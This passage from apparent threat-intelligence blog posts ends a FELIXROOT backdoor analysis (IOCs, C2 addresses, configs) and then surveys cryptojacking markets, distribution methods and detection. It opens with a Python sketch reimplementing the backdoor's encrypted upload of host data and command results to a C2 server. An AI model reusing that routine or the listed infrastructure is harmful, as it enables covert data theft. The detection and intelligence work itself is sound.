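Putting these pieces together, a heavily hedged Python sketch of the message flow described above might look like the following. The exact structure from Figure 15 and Figure 16, the AES mode and padding, and the mapping of encrypted fields to the u=/h=/p= parameters are all assumptions; the sketch requires the pycryptodome and requests packages.

import base64
import os

import requests
from Crypto.Cipher import AES, PKCS1_v1_5
from Crypto.PublicKey import RSA
from Crypto.Util.Padding import pad

def send_to_c2(c2_url: str, rsa_pub_pem: str, host_info: bytes, command_result: bytes):
    aes_key = os.urandom(32)                      # unique AES key per communication
    iv = os.urandom(16)
    cipher = AES.new(aes_key, AES.MODE_CBC, iv)
    encrypted = iv + cipher.encrypt(pad(command_result, AES.block_size))

    # Protect the per-message AES key with one of the embedded RSA public keys.
    wrapped_key = PKCS1_v1_5.new(RSA.import_key(rsa_pub_pem)).encrypt(aes_key)

    data = {
        "u": base64.b64encode(host_info).decode(),      # target machine information
        "h": base64.b64encode(encrypted).decode(),      # command executed and its results
        "p": base64.b64encode(wrapped_key).decode(),    # data associated with the C2 server
    }
    return requests.post(c2_url, data=data, timeout=30)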

The FELIXROOT backdoor contains several commands for specific tasks. After executing each task, the malware sleeps for one minute before executing the next one. Once all the tasks have been executed, the malware breaks the loop, sends the termination buffer back, and clears all of its footprints from the targeted machine:

  1. Deletes the LNK file from the startup directory.
  2. Deletes the registry key HKCU\Software\Classes\Applications\rundll32.exe\shell\open
  3. Deletes the dropper components from the system.

Conclusion

CVE-2017-0199 and CVE-2017-11882 are two of the more commonly exploited vulnerabilities that we are currently seeing. Threat actors will increasingly leverage these vulnerabilities in their attacks until they are no longer finding success, so organizations must ensure they are protected. At the time of writing, the FireEye Multi-Vector Execution (MVX) engine is able to recognize and block this threat. We also advise that all industries remain on alert, as the threat actors involved in this campaign may eventually broaden the scope of their current targeting.

Appendix

Indicators of Compromise

MD5 Hash | Filename / Description
11227ECA89CC053FB189FAC3EBF27497 | Seminar.rtf
4DE5ADB865B5198B4F2593AD436FCEFF | Seminar.rtf
78734CD268E5C9AB4184E1BBE21A6EB9 | Zam<RandomNumber>.doc
92F63B1227A6B37335495F9BCB939EA2 | FELIXROOT Dropper
DE10A32129650849CEAF4009E660F72F | FELIXROOT Backdoor

Table 4: FELIXROOT IOCs

Network Indicators of Compromise

217.12.204.100/news

217.12.204.100:443/news

193.23.181.151/Seminar.rtf

Accept-Encoding: gzip, deflate

content-Type: application/x-www-form-urlencoded

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)

Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)

Configuration Files

Version 1:

{"1" : "https://88.198.13.116:8443/xmlservice","2" : "30","4" : "GufseGHbc","6" : "3", "7" : "http://88.198.13.116:8080/xmlservice"}

Version 2:

{"1" : "https://217.12.204.100/news/","2" : "30","4" : "KdfrJKN","6" : "3", "7" : "http://217.12.204.100/news/"}

FireEye Detections

MD5 | Product | Signature | Action
11227ECA89CC053FB189FAC3EBF27497 | NX/EX/AX | Malware.Binary.rtf | Block
4DE5ADB865B5198B4F2593AD436FCEFF | NX/EX/AX | Malware.Binary.rtf | Block
78734CD268E5C9AB4184E1BBE21A6EB9 | NX/EX/AX | Malware.Binary | Block
92F63B1227A6B37335495F9BCB939EA2 | NX/EX/AX | FE_Dropper_Win32_FELIXROOT_1 | Block
DE10A32129650849CEAF4009E660F72F | NX/EX/AX | FE_Backdoor_Win32_FELIXROOT_2 | Block
11227ECA89CC053FB189FAC3EBF27497 | HX | IOC | Alert
4DE5ADB865B5198B4F2593AD436FCEFF | HX | IOC | Alert

Table 5: FireEye Detections

Acknowledgements

Special thanks to Jonell Baltazar, Alex Berry and Benjamin Read for their contributions to this blog.

How the Rise of Cryptocurrencies Is Shaping the Cyber Crime Landscape: The Growth of Miners

Introduction

Cyber criminals tend to favor cryptocurrencies because they provide a certain level of anonymity and can be easily monetized. This interest has increased in recent years, stemming far beyond the desire to simply use cryptocurrencies as a method of payment for illicit tools and services. Many actors have also attempted to capitalize on the growing popularity of cryptocurrencies, and subsequent rising price, by conducting various operations aimed at them. These operations include malicious cryptocurrency mining (also referred to as cryptojacking), the collection of cryptocurrency wallet credentials, extortion activity, and the targeting of cryptocurrency exchanges.

This blog post discusses the various trends that we have been observing related to cryptojacking activity, including cryptojacking modules being added to popular malware families, an increase in drive-by cryptomining attacks, the use of mobile apps containing cryptojacking code, cryptojacking as a threat to critical infrastructure, and observed distribution mechanisms.

What Is Mining?

As transactions occur on a blockchain, those transactions must be validated and propagated across the network. As computers connected to the blockchain network (aka nodes) validate and propagate the transactions across the network, the miners include those transactions into "blocks" so that they can be added onto the chain. Each block is cryptographically hashed, and must include the hash of the previous block, thus forming the "chain" in blockchain. In order for miners to compute the complex hashing of each valid block, they must use a machine's computational resources. The more blocks that are mined, the more resource-intensive solving the hash becomes. To overcome this, and accelerate the mining process, many miners will join collections of computers called "pools" that work together to calculate the block hashes. The more computational resources a pool harnesses, the greater the pool's chance of mining a new block. When a new block is mined, the pool's participants are rewarded with coins. Figure 1 illustrates the roles miners play in the blockchain network.


Figure 1: The role of miners
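
As a toy Python illustration of why mining is computationally expensive and how blocks chain together (this is conceptual only and does not reflect any particular coin's consensus rules):

import hashlib
import json

def block_hash(prev_hash: str, transactions: list, nonce: int) -> str:
    # Each block's hash covers the previous block's hash, forming the "chain".
    payload = json.dumps(
        {"prev": prev_hash, "txs": transactions, "nonce": nonce}, sort_keys=True
    ).encode()
    return hashlib.sha256(payload).hexdigest()

def mine(prev_hash: str, transactions: list, difficulty: int = 4):
    # Brute-force a nonce until the hash meets the proof-of-work target;
    # higher difficulty means more hashing work (and more CPU time).
    nonce = 0
    while True:
        candidate = block_hash(prev_hash, transactions, nonce)
        if candidate.startswith("0" * difficulty):
            return nonce, candidate
        nonce += 1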

Underground Interest

FireEye iSIGHT Intelligence has identified eCrime actor interest in cryptocurrency mining-related topics dating back to at least 2009 within underground communities. Keywords that yielded significant volumes include miner, cryptonight, stratum, xmrig, and cpuminer. While searches for certain keywords fail to provide context, the frequency of these cryptocurrency mining-related keywords shows a sharp increase in conversations beginning in 2017 (Figure 2). It is probable that at least a subset of actors prefer cryptojacking over other types of financially motivated operations due to the perception that it does not attract as much attention from law enforcement.


Figure 2: Underground keyword mentions

Monero Is King

The majority of recent cryptojacking operations have overwhelmingly focused on mining Monero, an open-source cryptocurrency based on the CryptoNote protocol and forked from Bytecoin. Unlike many cryptocurrencies, Monero uses a technology called "ring signatures," which shuffles users' public keys to eliminate the possibility of identifying a particular user, making transactions untraceable. Monero also employs a protocol that generates multiple, unique single-use addresses that can only be associated with the payment recipient and are infeasible to reveal through blockchain analysis, ensuring that Monero transactions cannot be linked while remaining cryptographically secure.

The Monero blockchain also uses a "memory-hard" hashing algorithm called CryptoNight, which, unlike Bitcoin's SHA-256 algorithm, deters application-specific integrated circuit (ASIC) chip mining. This feature is critical to the Monero developers and allows CPU mining to remain feasible and profitable. Due to these inherent privacy-focused features and CPU-mining profitability, Monero has become an attractive option for cyber criminals.

Underground Advertisements for Miners

Because most miner utilities are small, open-source tools, many criminals rely on crypters. Crypters are tools that employ encryption, obfuscation, and code manipulation techniques to keep their tools and malware fully undetectable (FUD). Table 1 highlights some of the most commonly repurposed Monero miner utilities.

XMR Mining Utilities
XMR-STACK
MINERGATE
XMRMINER
CCMINER
XMRIG
CLAYMORE
SGMINER
CAST XMR
LUKMINER
CPUMINER-MULTI

Table 1: Commonly used Monero miner utilities

The following are sample advertisements for miner utilities commonly observed in underground forums and markets. Advertisements typically range from stand-alone miner utilities to those bundled with other functions, such as credential harvesters, remote administration tool (RAT) behavior, USB spreaders, and distributed denial-of-service (DDoS) capabilities.

Sample Advertisement #1 (Smart Miner + Builder)

In early April 2018, actor "Mon£y" was observed by FireEye iSIGHT Intelligence selling a Monero miner for $80 USD – payable via Bitcoin, Bitcoin Cash, Ether, Litecoin, or Monero – that included unlimited builds, free automatic updates, and 24/7 support. The tool, dubbed Monero Madness (Figure 3), featured a setting called Madness Mode that configures the miner to only run when the infected machine is idle for at least 60 seconds. This allows the miner to work at its full potential without running the risk of being identified by the user. According to the actor, Monero Madness also provides the following features:

  • Unlimited builds
  • Builder GUI (Figure 4)
  • Written in AutoIT (no dependencies)
  • FUD
  • Safer error handling
  • Uses most recent XMRig code
  • Customizable pool/port
  • Packed with UPX
  • Works on all Windows OS (32- and 64-bit)
  • Madness Mode option


Figure 3: Monero Madness


Figure 4: Monero Madness builder

Sample Advertisement #2 (Miner + Telegram Bot Builder)

In March 2018, FireEye iSIGHT Intelligence observed actor "kent9876" advertising a Monero cryptocurrency miner called Goldig Miner (Figure 5). The actor requested payment of $23 USD for either CPU or GPU build or $50 USD for both. Payments could be made with Bitcoin, Ether, Litecoin, Dash, or PayPal. The miner ostensibly offers the following features:

  • Written in C/C++
  • Build size is small (about 100–150 kB)
  • Hides miner process from popular task managers
  • Can run without Administrator privileges (user-mode)
  • Auto-update ability
  • All data encoded with 256-bit key
  • Access to Telegram bot-builder
  • Lifetime support (24/7) via Telegram


Figure 5: Goldig Miner advertisement

Sample Advertisement #3 (Miner + Credential Stealer)

In March 2018, FireEye iSIGHT Intelligence observed actor "TH3FR3D" offering a tool dubbed Felix (Figure 6) that combines a cryptocurrency miner and credential stealer. The actor requested payment of $50 USD payable via Bitcoin or Ether. According to the advertisement, the Felix tool boasted the following features:

  • Written in C# (Version 1.0.1.0)
  • Browser stealer for all major browsers (cookies, saved passwords, auto-fill)
  • Monero miner (uses minergate.com pool by default, but can be configured)
  • Filezilla stealer
  • Desktop file grabber (.txt and more)
  • Can download and execute files
  • Update ability
  • USB spreader functionality
  • PHP web panel


Figure 6: Felix HTTP

Sample Advertisement #4 (Miner + RAT)

In January 2018, FireEye iSIGHT Intelligence observed actor "ups" selling a miner for any Cryptonight-based cryptocurrency (e.g., Monero and Dashcoin) for either Linux or Windows operating systems. In addition to being a miner, the tool allegedly provides local privilege escalation through the CVE-2016-0099 exploit, can download and execute remote files, and receive commands. Buyers could purchase the Windows or Linux tool for €200 EUR, or €325 EUR for both the Linux and Windows builds, payable via Monero, bitcoin, ether, or dash. According to the actor, the tool offered the following:

Windows Build Specifics

  • Written in C++ (no dependencies)
  • Miner component based on XMRig
  • Easy cryptor and VPS hosting options
  • Web panel (Figure 7)
  • Uses TLS for secured communication
  • Download and execute
  • Auto-update ability
  • Cleanup routine
  • Receive remote commands
  • Perform privilege escalation
  • Features "game mode" (mining stops if user plays game)
  • Proxy feature (based on XMRig)
  • Support (for €20/month)
  • Kills other miners from list
  • Hidden from TaskManager
  • Configurable pool, coin, and wallet (via panel)
  • Can mine the following Cryptonight-based coins:
    • Monero
    • Bytecoin
    • Electroneum
    • DigitalNote
    • Karbowanec
    • Sumokoin
    • Fantomcoin
    • Dinastycoin
    • Dashcoin
    • LeviarCoin
    • BipCoin
    • QuazarCoin
    • Bitcedi

Linux Build Specifics

  • Issues running on Linux servers (higher performance on desktop OS)
  • Compatible with AMD64 processors on Ubuntu, Debian, Mint (support for CentOS later)


Figure 7: Miner bot web panel

Sample Advertisement #5 (Miner + USB Spreader + DDoS Tool)

In August 2017, actor "MeatyBanana" was observed by FireEye iSIGHT Intelligence selling a Monero miner utility that included the ability to download and execute files and perform DDoS attacks. The actor offered the software for $30 USD, payable via Bitcoin. Ostensibly, the tool works with CPUs only and offers the following features:

  • Configurable miner pool and port (default to minergate)
  • Compatible with both 64- and 86-bit Windows OS
  • Hides from the following popular task managers:
    • Windows Task Manager
    • Process Killer
    • KillProcess
    • System Explorer
    • Process Explorer
    • AnVir
    • Process Hacker
  • Masked as a system driver
  • Does not require administrator privileges
  • No dependencies
  • Registry persistence mechanism
  • Ability to perform "tasks" (download and execute files, navigate to a site, and perform DDoS)
  • USB spreader
  • Support after purchase

The Cost of Cryptojacking

The presence of mining software on a network can generate costs on three fronts as the miner surreptitiously allocates resources:

  1. Degradation in system performance
  2. Increased cost in electricity
  3. Potential exposure of security holes

Cryptojacking targets computer processing power, which can lead to high CPU load and degraded performance. In extreme cases, CPU overload may even cause the operating system to crash. Infected machines may also attempt to infect neighboring machines and therefore generate large amounts of traffic that can overload victims' computer networks.

In the case of operational technology (OT) networks, the consequences could be severe. Supervisory control and data acquisition/industrial control system (SCADA/ICS) environments predominantly rely on decades-old hardware and low-bandwidth networks, so even a slight increase in CPU load or network traffic could leave industrial infrastructure unresponsive, preventing operators from interacting with the controlled process in real time.

The electricity cost, measured in kilowatt hour (kWh), is dependent upon several factors: how often the malicious miner software is configured to run, how many threads it's configured to use while running, and the number of machines mining on the victim's network. The cost per kWh is also highly variable and depends on geolocation. For example, security researchers who ran Coinhive on a machine for 24 hours found that the electrical consumption was 1.212kWh. They estimated that this equated to electrical costs per month of $10.50 USD in the United States, $5.45 USD in Singapore, and $12.30 USD in Germany.
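
The arithmetic behind those figures is straightforward; the per-kWh prices below are illustrative assumptions chosen to roughly reproduce the cited monthly costs, and actual tariffs vary.

DAILY_KWH = 1.212
MONTHLY_KWH = DAILY_KWH * 30          # roughly 36.4 kWh per infected machine per month

# Approximate residential electricity prices in USD per kWh (assumed values).
PRICES = {"United States": 0.29, "Singapore": 0.15, "Germany": 0.34}

for country, usd_per_kwh in PRICES.items():
    print(f"{country}: ~${MONTHLY_KWH * usd_per_kwh:.2f} USD per month")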

Cryptojacking can also highlight often overlooked security holes in a company's network. Organizations infected with cryptomining malware are also likely vulnerable to more severe exploits and attacks, ranging from ransomware to ICS-specific malware such as TRITON.

Cryptocurrency Miner Distribution Techniques

In order to maximize profits, cyber criminals widely disseminate their miners using various techniques such as incorporating cryptojacking modules into existing botnets, drive-by cryptomining attacks, the use of mobile apps containing cryptojacking code, and distributing cryptojacking utilities via spam and self-propagating utilities. Threat actors can use cryptojacking to affect numerous devices and secretly siphon their computing power. Some of the most commonly observed devices targeted by these cryptojacking schemes are:

  • User endpoint machines
  • Enterprise servers
  • Websites
  • Mobile devices
  • Industrial control systems

Cryptojacking in the Cloud

Private sector companies and governments alike are increasingly moving their data and applications to the cloud, and cyber threat groups have been moving with them. Recently, there have been various reports of actors conducting cryptocurrency mining operations specifically targeting cloud infrastructure. Cloud infrastructure is increasingly a target for cryptojacking operations because it offers actors an attack surface with large amounts of processing power in an environment where CPU usage and electricity costs are already expected to be high, thus allowing their operations to potentially go unnoticed. We assess with high confidence that threat actors will continue to target enterprise cloud networks in efforts to harness their collective computational resources for the foreseeable future.

The following are some real-world examples of cryptojacking in the cloud:

  • In February 2018, FireEye researchers published a blog detailing various techniques actors used in order to deliver malicious miner payloads (specifically to vulnerable Oracle servers) by abusing CVE-2017-10271. Refer to our blog post for more detailed information regarding the post-exploitation and pre-mining dissemination techniques used in those campaigns.
  • In March 2018, Bleeping Computer reported on the trend of cryptocurrency mining campaigns moving to the cloud via vulnerable Docker and Kubernetes applications, which are two software tools used by developers to help scale a company's cloud infrastructure. In most cases, successful attacks occur due to misconfigured applications and/or weak security controls and passwords.
  • In February 2018, Bleeping Computer also reported on hackers who breached Tesla's cloud servers to mine Monero. Attackers identified a Kubernetes console that was not password protected, allowing them to discover login credentials for the broader Tesla Amazon Web services (AWS) S3 cloud environment. Once the attackers gained access to the AWS environment via the harvested credentials, they effectively launched their cryptojacking operations.
  • Reports of cryptojacking activity due to misconfigured AWS S3 cloud storage buckets have also been observed, as was the case in the LA Times online compromise in February 2018. The presence of vulnerable AWS S3 buckets allows anyone on the internet to access and change hosted content, including the ability to inject mining scripts or other malicious software.

Incorporation of Cryptojacking into Existing Botnets

FireEye iSIGHT Intelligence has observed multiple prominent botnets such as Dridex and Trickbot incorporate cryptocurrency mining into their existing operations. Many of these families are modular in nature and have the ability to download and execute remote files, thus allowing the operators to easily turn their infections into cryptojacking bots. While these operations have traditionally been aimed at credential theft (particularly of banking credentials), adding mining modules or downloading secondary mining payloads provides the operators another avenue to generate additional revenue with little effort. This is especially true in cases where the victims were deemed unprofitable or have already been exploited in the original scheme.

The following are some real-world examples of cryptojacking being incorporated into existing botnets:

  • In early February 2018, FireEye iSIGHT Intelligence observed Dridex botnet ID 2040 download a Monero cryptocurrency miner based on the open-source XMRig miner.
  • On Feb. 12, 2018, FireEye iSIGHT Intelligence observed the banking malware IcedID injecting Monero-mining JavaScript into webpages for specific, targeted URLs. The IcedID injects launched an anonymous miner using the mining code from Coinhive's AuthedMine.
  • In late 2017, Bleeping Computer reported that security researchers with Radware observed the hacking group CodeFork leveraging the popular downloader Andromeda (aka Gamarue) to distribute a miner module to their existing botnets.
  • In late 2017, FireEye researchers observed Trickbot operators deploy a new module named "testWormDLL" that is a statically compiled copy of the popular XMRig Monero miner.
  • On Aug. 29, 2017, Security Week reported on a variant of the popular Neutrino banking Trojan that includes a Monero miner module. According to their reporting, the new variant no longer aims at stealing bank card data, but instead is limited to downloading and executing modules from a remote server.

Drive-By Cryptojacking

In-Browser

FireEye iSIGHT Intelligence has examined various customer reports of browser-based cryptocurrency mining. Browser-based mining scripts have been observed on compromised websites, third-party advertising platforms, and have been legitimately placed on websites by publishers. While coin mining scripts can be embedded directly into a webpage's source code, they are frequently loaded from third-party websites. Identifying and detecting websites that have embedded coin mining code can be difficult since not all coin mining scripts are authorized by website publishers, such as in the case of a compromised website. Further, in cases where coin mining scripts were authorized by a website owner, they are not always clearly communicated to site visitors. At the time of reporting, the most popular script being deployed in the wild is Coinhive. Coinhive is an open-source JavaScript library that, when loaded on a vulnerable website, can mine Monero using the site visitor's CPU resources, unbeknownst to the user, as they browse the site.

The following are some real-world examples of Coinhive being deployed in the wild:

  • In September 2017, Bleeping Computer reported that the authors of SafeBrowse, a Chrome extension with more than 140,000 users, had embedded the Coinhive script in the extension's code, allowing it to mine Monero using users' computers without their consent.
  • During mid-September 2017, users on Reddit began complaining about increased CPU usage when they navigated to a popular torrent site, The Pirate Bay (TPB). The spike in CPU usage was a result of Coinhive's script being embedded within the site's footer. According to TPB operators, it was implemented as a test to generate passive revenue for the site (Figure 8).
  • In December 2017, researchers with Sucuri reported on the presence of the Coinhive script being hosted on GitHub.io, which allows users to publish web pages directly from GitHub repositories.
  • Other reporting disclosed the Coinhive script being embedded on the Showtime domain as well as on the LA Times website, both surreptitiously mining Monero.
  • A majority of in-browser cryptojacking activity is transitory in nature and will last only as long as the user’s web browser is open. However, researchers with Malwarebytes Labs uncovered a technique that allows for continued mining activity even after the browser window is closed. The technique leverages a pop-under window surreptitiously hidden under the taskbar. As the researchers pointed out, closing the browser window may not be enough to interrupt the activity; more advanced actions, such as running Task Manager, may be required.


Figure 8: Statement from TPB operators on Coinhive script

Malvertising and Exploit Kits

Malvertisements – malicious ads on legitimate websites – commonly redirect visitors of a site to an exploit kit landing page. These landing pages are designed to scan a system for vulnerabilities, exploit those vulnerabilities, and download and execute malicious code onto the system. Notably, the malicious advertisements can be placed on legitimate sites and visitors can become infected with little to no user interaction. This distribution tactic is commonly used by threat actors to widely distribute malware and has been employed in various cryptocurrency mining operations.

The following are some real-world examples of this activity:

  • In early 2018, researchers with Trend Micro reported that a modified miner script was being disseminated across YouTube via Google's DoubleClick ad delivery platform. The script was configured to generate a random number variable between 1 and 100, and when the variable was above 10 it would launch the Coinhive script coinhive.min.js, which harnessed 80 percent of the CPU power to mine Monero. When the variable was below 10 it launched a modified Coinhive script that was also configured to harness 80 percent CPU power to mine Monero. This custom miner connected to the mining pool wss[:]//ws[.]l33tsite[.]info:8443, which was likely done to avoid Coinhive's fees.
  • In April 2018, researchers with Trend Micro also discovered a JavaScript code based on Coinhive injected into an AOL ad platform. The miner used the following private mining pools: wss[:]//wsX[.]www.datasecu[.]download/proxy and wss[:]//www[.]jqcdn[.]download:8893/proxy. Examination of other sites compromised by this campaign showed that in at least some cases the operators were hosting malicious content on unsecured AWS S3 buckets.
  • Since July 16, 2017, FireEye has observed the Neptune Exploit Kit redirect to ads for hiking clubs and MP3 converter domains. Payloads associated with the latter include Monero CPU miners that are surreptitiously installed on victims' computers.
  • In January 2018, Check Point researchers discovered a malvertising campaign leading to the Rig Exploit Kit, which served the XMRig Monero miner utility to unsuspecting victims.

Mobile Cryptojacking

In addition to targeting enterprise servers and user machines, threat actors have also targeted mobile devices for cryptojacking operations. While this technique is less common, likely due to the limited processing power afforded by mobile devices, cryptojacking on mobile devices remains a threat as sustained power consumption can damage the device and dramatically shorten the battery life. Threat actors have been observed targeting mobile devices by hosting malicious cryptojacking apps on popular app stores and through drive-by malvertising campaigns that identify users of mobile browsers.

The following are some real-world examples of mobile devices being used for cryptojacking:

  • During 2014, FireEye iSIGHT Intelligence reported on multiple Android malware apps capable of mining cryptocurrency:
    • In March 2014, Android malware named "CoinKrypt" was discovered, which mined Litecoin, Dogecoin, and CasinoCoin currencies.
    • In March 2014, another form of Android malware – "Android.Trojan.MuchSad.A" or "ANDROIDOS_KAGECOIN.HBT" – was observed mining Bitcoin, Litecoin, and Dogecoin currencies. The malware was disguised as copies of popular applications, including "Football Manager Handheld" and "TuneIn Radio." Variants of this malware have reportedly been downloaded by millions of Google Play users.
    • In April 2014, Android malware named "BadLepricon," which mined Bitcoin, was identified. The malware was reportedly being bundled into wallpaper applications hosted on the Google Play store, at least several of which received 100 to 500 installations before being removed.
    • In October 2014, a type of mobile malware called "Android Slave" was observed in China; the malware was reportedly capable of mining multiple virtual currencies.
  • In December 2017, researchers with Kaspersky Labs reported on a new multi-faceted Android malware capable of a variety of actions including mining cryptocurrencies and launching DDoS attacks. The resource load created by the malware has reportedly been high enough that it can cause the battery to bulge and physically destroy the device. The malware, dubbed Loapi, is unique in the breadth of its potential actions. It has a modular framework that includes modules for malicious advertising, texting, web crawling, Monero mining, and other activities. Loapi is thought to be the work of the same developers behind the 2015 Android malware Podec, and is usually disguised as an anti-virus app.
  • In January 2018, SophosLabs released a report detailing their discovery of 19 mobile apps hosted on Google Play that contained embedded Coinhive-based cryptojacking code, some of which were downloaded anywhere from 100,000 to 500,000 times.
  • Between November 2017 and January 2018, researchers with Malwarebytes Labs reported on a drive-by cryptojacking campaign that affected millions of Android mobile browsers to mine Monero.

Cryptojacking Spam Campaigns

FireEye iSIGHT Intelligence has observed several cryptocurrency miners distributed via spam campaigns, which is a commonly used tactic to indiscriminately distribute malware. We expect malicious actors will continue to use this method to disseminate cryptojacking code for as long as cryptocurrency mining remains profitable.

In late November 2017, FireEye researchers identified a spam campaign delivering a malicious PDF attachment designed to appear as a legitimate invoice from the largest port and container service in New Zealand: Lyttelton Port of Christchurch (Figure 9). Once opened, the PDF would launch a PowerShell script that downloaded a Monero miner from a remote host. The malicious miner connected to the pools supportxmr.com and nanopool.org.


Figure 9: Sample lure attachment (PDF) that downloads malicious cryptocurrency miner

Additionally, a massive cryptojacking spam campaign was discovered by FireEye researchers during January 2018 that was designed to look like legitimate financial services-related emails. The spam email directed victims to an infection link that ultimately dropped a malicious ZIP file onto the victim's machine. Contained within the ZIP file was a cryptocurrency miner utility (MD5: 80b8a2d705d5b21718a6e6efe531d493) configured to mine Monero and connect to the minergate.com pool. While each of the spam email lures and associated ZIP filenames were different, the same cryptocurrency miner sample was dropped across all observed instances (Table 2).

ZIP Filenames

  • california_540_tax_form_2013_instructions.exe
  • state_bank_of_india_money_transfer_agency.exe
  • format_transfer_sms_banking_bni_ke_bca.exe
  • confirmation_receipt_letter_sample.exe
  • sbi_online_apply_2015_po.exe
  • estimated_tax_payment_coupon_irs.exe
  • how_to_add_a_non_us_bank_account_to_paypal.exe
  • western_union_money_transfer_from_uk_to_bangladesh.exe
  • can_i_transfer_money_from_bank_of_ireland_to_aib_online.exe
  • how_to_open_a_business_bank_account_with_bad_credit_history.exe
  • apply_for_sbi_credit_card_online.exe
  • list_of_lucky_winners_in_dda_housing_scheme_2014.exe

Table 2: Sampling of observed ZIP filenames delivering cryptocurrency miner

Cryptojacking Worms

Following the WannaCry attacks, actors began to increasingly incorporate self-propagating functionality within their malware. Some of the observed self-spreading techniques have included copying to removable drives, brute forcing SSH logins, and leveraging the leaked NSA exploit EternalBlue. Cryptocurrency mining operations significantly benefit from this functionality since wider distribution of the malware multiplies the amount of CPU resources available to them for mining. Consequently, we expect that additional actors will continue to develop this capability.

The following are some real-world examples of cryptojacking worms:

  • In May 2017, Proofpoint reported a large campaign distributing mining malware "Adylkuzz." This cryptocurrency miner was observed leveraging the EternalBlue exploit to rapidly spread itself over corporate LANs and wireless networks. This activity included the use of the DoublePulsar backdoor to download Adylkuzz. Adylkuzz infections create botnets of Windows computers that focus on mining Monero.
  • Security researchers with Sensors identified a Monero miner worm, dubbed "Rarogminer," in April 2018 that would copy itself to removable drives each time a user inserted a flash drive or external HDD.
  • In January 2018, researchers at F5 discovered a new Monero cryptomining botnet that targets Linux machines. PyCryptoMiner is based on Python script and spreads via the SSH protocol. The bot can also use Pastebin for its command and control (C2) infrastructure. The malware spreads by trying to guess the SSH login credentials of target Linux systems. Once that is achieved, the bot deploys a simple base64-encoded Python script that connects to the C2 server to download and execute more malicious Python code.

Detection Avoidance Methods

Another trend worth noting is the use of proxies to avoid detection. The implementation of mining proxies presents an attractive option for cyber criminals because it allows them to avoid developer and commission fees of 30 percent or more. Avoiding the use of common cryptojacking services such as Coinhive, Cryptoloot, and Deepminer, and instead hosting cryptojacking scripts on actor-controlled infrastructure, can circumvent many of the common strategies taken to block this activity via domain or file name blacklisting.

In March 2018, Bleeping Computer reported on the use of cryptojacking proxy servers and determined that as the use of cryptojacking proxy services increases, the effectiveness of ad blockers and browser extensions that rely on blacklists decreases significantly.

Several mining proxy tools can be found on GitHub, such as the XMRig Proxy tool, which greatly reduces the number of active pool connections, and the CoinHive Stratum Mining Proxy, which uses Coinhive’s JavaScript mining library to provide an alternative to using official Coinhive scripts and infrastructure.

In addition to using proxies, actors may also establish their own self-hosted miner apps, either on private servers or on cloud-based servers that support Node.js. Although private servers may provide some benefit over using a commercial mining service, they are still subject to easy blacklisting and require more operational effort to maintain. According to Sucuri researchers, cloud-based servers provide many benefits to actors looking to host their own mining applications, including:

  • Available free or at low-cost
  • No maintenance, just upload the crypto-miner app
  • Harder to block as blacklisting the host address could potentially impact access to legitimate services
  • Resilient to permanent takedown as new hosting accounts can more easily be created using disposable accounts

The combination of proxies and crypto-miners hosted on actor-controlled cloud infrastructure presents a significant hurdle to security professionals, as both make cryptojacking operations more difficult to detect and take down.

Mining Victim Demographics

Based on data from FireEye detection technologies, the detection of cryptocurrency miner malware has increased significantly since the beginning of 2018 (Figure 10), with the most popular mining pools being minergate and nanopool (Figure 11), and the most heavily affected country being the U.S. (Figure 12). Consistent with other reporting, the education sector remains most affected, likely due to more relaxed security controls across university networks and students taking advantage of free electricity to mine cryptocurrencies (Figure 13).


Figure 10: Cryptocurrency miner detection activity per month


Figure 11: Commonly observed pools and associated ports


Figure 12: Top 10 affected countries


Figure 13: Top five affected industries


Figure 14: Top affected industries by country

Mitigation Techniques

Unencrypted Stratum Sessions

According to security researchers at Cato Networks, for a miner to participate in pool mining, the infected machine must run native or JavaScript-based code that uses the Stratum protocol over TCP or HTTP/S. The Stratum protocol uses a publish/subscribe architecture in which clients send subscription requests to join a pool and servers publish messages to their subscribed clients. These messages are simple, readable JSON-RPC messages. Subscription requests include the following entities: id, method, and params (Figure 15). A deep packet inspection (DPI) engine can be configured to look for these parameters in order to block Stratum over unencrypted TCP.


Figure 15: Stratum subscription request parameters
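As a rough illustration of this approach, the following Python sketch applies the same heuristic to a reassembled TCP payload. The sample message and method names are illustrative rather than taken from any specific pool, and a production DPI rule would be considerably more robust.

```python
import json

# Illustrative Stratum subscription request as it might appear in a reassembled
# TCP payload; the field values are examples, not taken from a specific pool.
SAMPLE = b'{"id": 1, "method": "mining.subscribe", "params": ["XMRig/2.6.0"]}\n'

def looks_like_stratum(payload: bytes) -> bool:
    """Heuristic check a DPI engine might apply to unencrypted traffic."""
    try:
        msg = json.loads(payload.decode("utf-8"))
    except (UnicodeDecodeError, ValueError):
        return False
    if not isinstance(msg, dict):
        return False
    # Stratum messages are JSON-RPC objects carrying id, method, and params.
    if not all(field in msg for field in ("id", "method", "params")):
        return False
    # Subscription/login requests use methods such as mining.subscribe,
    # mining.authorize, or (for some Monero pools) simply "login".
    method = str(msg.get("method", ""))
    return method.startswith("mining.") or method == "login"

if __name__ == "__main__":
    print("Stratum-like payload:", looks_like_stratum(SAMPLE))
```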

Encrypted Stratum Sessions

In the case of JavaScript-based miners running Stratum over HTTPS, detection is more difficult for DPI engines that do not decrypt TLS traffic. To mitigate encrypted mining traffic on a network, organizations may blacklist the IP addresses and domains of popular mining pools. However, the downside of this approach is maintaining the blacklist, as locating a reliable and continually updated list of popular mining pools can prove difficult and time consuming.

Browser-Based Sessions

Identifying and detecting websites that have embedded coin mining code can be difficult since not all coin mining scripts are authorized by website publishers (as in the case of a compromised website). Further, in cases where coin mining scripts were authorized by a website owner, they are not always clearly communicated to site visitors.

